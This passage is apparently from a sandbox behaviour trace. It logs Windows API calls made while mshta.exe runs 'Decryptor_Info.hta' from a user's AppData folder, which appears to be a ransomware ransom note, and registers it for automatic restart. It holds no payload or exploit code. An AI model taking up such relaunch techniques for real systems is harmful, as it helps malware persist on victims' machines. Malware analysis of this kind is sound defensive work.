(hKey=0x0) returned 0x6 [0109.306] RegCloseKey (hKey=0x98) returned 0x0 [0109.306] RegCloseKey (hKey=0x9c) returned 0x0 [0109.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x9c) returned 0x0 [0109.307] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.307] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.307] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.307] RegCloseKey (hKey=0x0) returned 0x6 [0109.307] RegCloseKey (hKey=0x0) returned 0x6 [0109.307] RegCloseKey (hKey=0x9c) returned 0x0 [0109.307] RegCloseKey (hKey=0x98) returned 0x0 [0109.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.308] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x9c) returned 0x0 [0109.308] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.308] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.308] RegCloseKey (hKey=0x0) returned 0x6 [0109.308] RegCloseKey (hKey=0x0) returned 0x6 [0109.308] RegCloseKey (hKey=0x98) returned 0x0 [0109.308] RegCloseKey (hKey=0x9c) returned 0x0 [0109.308] GetSystemMetrics (nIndex=68) returned 4 [0109.309] GetSystemMetrics (nIndex=69) returned 4 [0109.309] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0109.309] GetSystemDefaultLCID () returned 0x409 [0109.310] GetVersionExW (in: lpVersionInformation=0x22eebc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7410afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22eebc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0109.310] GetUserDefaultUILanguage () returned 0x409 [0109.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x22ee0c, cchData=16 | out: lpLCData="\x03") returned 16 [0109.311] GetKeyboardLayoutList (in: nBuff=32, lpList=0x22ee3c | out: lpList=0x22ee3c) returned 1 [0109.311] GetSystemMetrics (nIndex=4096) returned 0 [0109.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef60 | out: phkResult=0x22ef60*=0x9c) returned 0x0 [0109.312] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef64 | out: phkResult=0x22ef64*=0x98) returned 0x0 [0109.312] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef20 | out: phkResult=0x22ef20*=0x0) returned 0x2 [0109.312] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef20 | out: phkResult=0x22ef20*=0x0) returned 0x2 [0109.312] RegCloseKey (hKey=0x0) returned 0x6 [0109.312] RegCloseKey (hKey=0x0) returned 0x6 [0109.313] RegCloseKey (hKey=0x9c) returned 0x0 [0109.313] RegCloseKey (hKey=0x98) returned 0x0 [0109.313] GetModuleFileNameW (in: hModule=0x73bd0000, lpFilename=0x22edc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0109.313] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x3e) returned 0x463d48 [0109.313] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0109.313] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0109.313] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0109.313] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0109.313] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0109.313] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc184 [0109.313] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc185 [0109.313] GetDC (hWnd=0x0) returned 0x6010a73 [0109.313] SHCreateShellPalette (hdc=0x0) returned 0x4080abc [0109.314] GetPaletteEntries (in: hpal=0x4080abc, iStart=0x0, cEntries=0x100, pPalEntries=0x7410a494 | out: pPalEntries=0x7410a494) returned 0x100 [0109.314] SHGetInverseCMAP (in: pbMap=0x74108a7c, cbMap=0x4 | out: pbMap=0x74108a7c) returned 0x0 [0109.314] GetDeviceCaps (hdc=0x6010a73, index=38) returned 32409 [0109.314] ReleaseDC (hWnd=0x0, hDC=0x6010a73) returned 1 [0109.314] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20a) returned 0x46e9e0 [0109.315] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2000) returned 0x46f3f8 [0109.315] GetCurrentProcessId () returned 0xe98 [0109.315] _vsnprintf (in: _DstBuf=0x22f30c, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x22efd4 | out: _DstBuf="#MSHTML#PERF#00000E98") returned 21 [0109.315] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000E98") returned 0x0 [0109.315] GetVersionExW (in: lpVersionInformation=0x22eff0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x453638, dwMinorVersion=0x100, dwBuildNumber=0x46dbe0, dwPlatformId=0x450000, szCSDVersion="A") | out: lpVersionInformation=0x22eff0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0109.315] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0109.316] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0109.316] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0109.316] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0109.316] EtwEventRegister () returned 0x0 [0109.316] EtwRegisterTraceGuidsW () returned 0x0 [0109.316] EtwRegisterTraceGuidsW () returned 0x0 [0109.316] EtwEventRegister () returned 0x0 [0109.318] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x22edbc | out: lpdwHandle=0x22edbc) returned 0x0 [0109.318] GetModuleHandleW (lpModuleName=0x0) returned 0xe10000 [0109.318] GetModuleFileNameW (in: hModule=0xe10000, lpFilename=0x22edc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0109.318] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0109.323] GetCurrentProcessId () returned 0xe98 [0109.323] GetCurrentProcessId () returned 0xe98 [0109.325] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0109.325] GetLastError () returned 0x0 [0109.339] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0x100 [0109.339] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xe0000 [0109.342] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x721da8 | out: hHeap=0x720000) returned 1 [0109.342] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x721eb8 | out: hHeap=0x720000) returned 1 [0109.342] RegCloseKey (hKey=0x42) returned 0x0 [0109.342] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0109.342] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0109.342] lstrlenA (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" ") returned 67 [0109.342] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x88) returned 0x721da8 [0109.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x452af0, cbMultiByte=-1, lpWideCharStr=0x721da8, cchWideChar=68 | out: lpWideCharStr="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" ") returned 68 [0109.342] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" ", dwFlags=0x0) returned 0x0 [0109.343] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x721da8 | out: hHeap=0x720000) returned 1 [0109.343] GetProcAddress (hModule=0x73bd0000, lpProcName="RunHTMLApplication") returned 0x73c2e710 [0109.347] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" " [0109.352] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8c) returned 0x473e20 [0109.352] OleInitialize (pvReserved=0x0) returned 0x0 [0109.366] IsWindow (hWnd=0x0) returned 0 [0109.366] RegisterClassW (lpWndClass=0x22f674) returned 0xc186 [0109.366] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xe10000, lpParam=0x74109680) returned 0x150268 [0109.367] NtdllDefWindowProc_W () returned 0x0 [0109.367] NtdllDefWindowProc_W () returned 0x1 [0109.369] NtdllDefWindowProc_W () returned 0x0 [0109.555] NtdllDefWindowProc_W () returned 0x0 [0109.555] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x150268, hMenu=0x0, hInstance=0xe10000, lpParam=0x74109680) returned 0x301f0 [0109.555] NtdllDefWindowProc_W () returned 0x0 [0109.556] NtdllDefWindowProc_W () returned 0x1 [0109.556] NtdllDefWindowProc_W () returned 0x0 [0109.556] NtdllDefWindowProc_W () returned 0x0 [0109.557] SetWindowLongW (hWnd=0x301f0, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0109.557] NtdllDefWindowProc_W () returned 0x0 [0109.557] NtdllDefWindowProc_W () returned 0x0 [0109.557] NtdllDefWindowProc_W () returned 0x0 [0109.557] NtdllDefWindowProc_W () returned 0x0 [0109.557] NtdllDefWindowProc_W () returned 0x0 [0109.558] NtdllDefWindowProc_W () returned 0x0 [0109.558] SetWindowPos (hWnd=0x301f0, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0109.558] NtdllDefWindowProc_W () returned 0x0 [0109.558] NtdllDefWindowProc_W () returned 0x0 [0109.558] NtdllDefWindowProc_W () returned 0x0 [0109.559] NtdllDefWindowProc_W () returned 0x0 [0109.560] NtdllDefWindowProc_W () returned 0x0 [0109.560] SendMessageW (hWnd=0x301f0, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0109.560] NtdllDefWindowProc_W () returned 0x0 [0109.560] NtdllDefWindowProc_W () returned 0x0 [0109.563] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8c) returned 0x47ac28 [0109.564] PathRemoveArgsW (in: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" " | out: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\"") [0109.564] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\"" | out: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\"") [0109.564] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\"" | out: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta") returned 1 [0109.565] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", ppmk=0x22f6d4*=0x0, dwFlags=0x1 | out: ppmk=0x22f6d4*=0x474038) returned 0x0 [0109.572] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47ac28 | out: hHeap=0x450000) returned 1 [0109.572] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b520 [0109.573] CoCreateInstance (in: rclsid=0x73d09770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d8b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x741096d4 | out: ppv=0x741096d4*=0x4822d0) returned 0x0 [0109.577] DllGetClassObject (in: rclsid=0x47f99c*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22e984 | out: ppv=0x22e984*=0x74108cb0) returned 0x0 [0109.580] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2a8) returned 0x480798 [0109.583] GetCurrentThreadId () returned 0xe9c [0109.585] RegisterClassExW (param_1=0x22e81c) returned 0xc187 [0109.585] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc187, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x73bd0000, lpParam=0x0) returned 0x30204 [0109.586] GetWindowLongW (hWnd=0x30204, nIndex=-20) returned 0 [0109.586] NtdllDefWindowProc_W () returned 0x1 [0109.586] NtdllDefWindowProc_W () returned 0x0 [0109.586] NtdllDefWindowProc_W () returned 0x0 [0109.586] NtdllDefWindowProc_W () returned 0x0 [0109.586] NtdllDefWindowProc_W () returned 0x0 [0109.586] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b5f8 [0109.586] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b610 [0109.586] CreateCompatibleDC (hdc=0x0) returned 0x160101d2 [0109.586] GetDeviceCaps (hdc=0x160101d2, index=90) returned 96 [0109.586] GetDeviceCaps (hdc=0x160101d2, index=88) returned 96 [0109.586] GetSystemMetrics (nIndex=68) returned 4 [0109.586] GetSystemMetrics (nIndex=69) returned 4 [0109.587] GetSystemMetrics (nIndex=2) returned 17 [0109.587] GetSystemMetrics (nIndex=3) returned 17 [0109.587] GetStockObject (i=13) returned 0x18a002e [0109.587] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x18a002e [0109.587] GetTextMetricsW (in: hdc=0x160101d2, lptm=0x22e8b4 | out: lptm=0x22e8b4) returned 1 [0109.587] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x18a002e [0109.587] DeleteObject (ho=0x18a002e) returned 1 [0109.587] GetSystemDefaultLCID () returned 0x409 [0109.587] GetUserDefaultLCID () returned 0x409 [0109.587] GetACP () returned 0x4e4 [0109.587] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x22e828, cchData=41 | out: lpLCData="1") returned 2 [0109.587] _wtoi (_String="1") returned 1 [0109.587] RegCloseKey (hKey=0x0) returned 0x6 [0109.587] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x22e87c, cchData=16 | out: lpLCData="0123456789") returned 11 [0109.587] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7410b038, fWinIni=0x0 | out: pvParam=0x7410b038) returned 1 [0109.587] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x22e8f0, fWinIni=0x0 | out: pvParam=0x22e8f0) returned 1 [0109.587] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc0) returned 0x480b50 [0109.587] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b628 [0109.587] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa4) returned 0x480c18 [0109.587] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x473360 [0109.588] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1c) returned 0x476d90 [0109.588] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469138 [0109.588] GetSystemWindowsDirectoryW (in: lpBuffer=0x22e6fc, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0109.588] lstrlenW (lpString="C:\\Windows") returned 10 [0109.588] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0109.588] CreateActCtxW (pActCtx=0x22e6d8) returned 0x480ccc [0109.589] ActivateActCtx (in: hActCtx=0x480ccc, lpCookie=0x22e6a8 | out: hActCtx=0x480ccc, lpCookie=0x22e6a8) returned 1 [0109.589] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x753e0000 [0109.597] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10100001) returned 1 [0109.597] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0109.597] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0109.597] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0109.598] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0109.598] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e308, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0109.598] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22e510, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0109.598] GetCurrentProcess () returned 0xffffffff [0109.598] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x22e718, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0109.599] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0109.599] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x473380 [0109.599] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0109.599] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x22e2f4, pvData=0x22e300, pcbData=0x22e2fc*=0x4 | out: pdwType=0x22e2f4*=0x0, pvData=0x22e300, pcbData=0x22e2fc*=0x4) returned 0x2 [0109.599] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e26c | out: phkResult=0x22e26c*=0x180) returned 0x0 [0109.599] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e270 | out: phkResult=0x22e270*=0x17c) returned 0x0 [0109.599] RegOpenKeyExW (in: hKey=0x17c, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x22e22c | out: phkResult=0x22e22c*=0x0) returned 0x2 [0109.599] RegOpenKeyExW (in: hKey=0x180, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x22e22c | out: phkResult=0x22e22c*=0x0) returned 0x2 [0109.599] RegCloseKey (hKey=0x0) returned 0x6 [0109.599] RegCloseKey (hKey=0x0) returned 0x6 [0109.600] RegCloseKey (hKey=0x180) returned 0x0 [0109.600] RegCloseKey (hKey=0x17c) returned 0x0 [0109.600] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x97c) returned 0x4822d0 [0109.600] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x480) returned 0x482c58 [0109.600] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0109.600] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0109.600] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0109.601] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4816b0 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4830e0 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x483138 [0109.601] GetCurrentThreadId () returned 0xe9c [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b6e8 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x46d700 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x80) returned 0x483190 [0109.601] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc188 [0109.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4733a0 [0109.603] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0109.603] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74108cd4, dwReserved=0x0 | out: ppSM=0x74108cd4*=0x483218) returned 0x0 [0109.607] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x64) returned 0x4837e8 [0109.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x483858 [0109.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x46d058 [0109.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4733c0 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469188 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4691d8 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x4838b0 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x64) returned 0x483918 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469228 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x483988 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xec) returned 0x483bf0 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469278 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4692c8 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469318 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x483ce8 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x483d50 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469368 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4693b8 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x90) returned 0x483db8 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x140) returned 0x483e50 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x47baa0 [0109.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x46d088 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4733e0 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xd0) returned 0x47c4e0 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x38) returned 0x47ac28 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x128) returned 0x483f98 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x148) returned 0x4840c8 [0109.611] GetCurrentThreadId () returned 0xe9c [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x5c) returned 0x484218 [0109.611] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x473400 [0109.611] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x22e61c | out: ppURI=0x22e61c*=0x47bf04) returned 0x0 [0109.612] IUri:GetPropertyDWORD (in: This=0x47bf04, uriProp=0x11, pdwProperty=0x22e604, dwFlags=0x0 | out: pdwProperty=0x22e604*=0x11) returned 0x0 [0109.612] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x482a04, dwReserved=0x0 | out: ppSM=0x482a04*=0x484280) returned 0x0 [0109.613] IInternetSecurityManager:SetSecuritySite (This=0x484280, pSite=0x482a0c) returned 0x0 [0109.613] IUnknown:AddRef (This=0x482a0c) returned 0x28 [0109.613] IUnknown:QueryInterface (in: This=0x482a0c, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x22e5d4 | out: ppvObject=0x22e5d4*=0x482a10) returned 0x0 [0109.613] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4842a8 | out: ppvObject=0x4842a8*=0x0) returned 0x80004002 [0109.613] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, 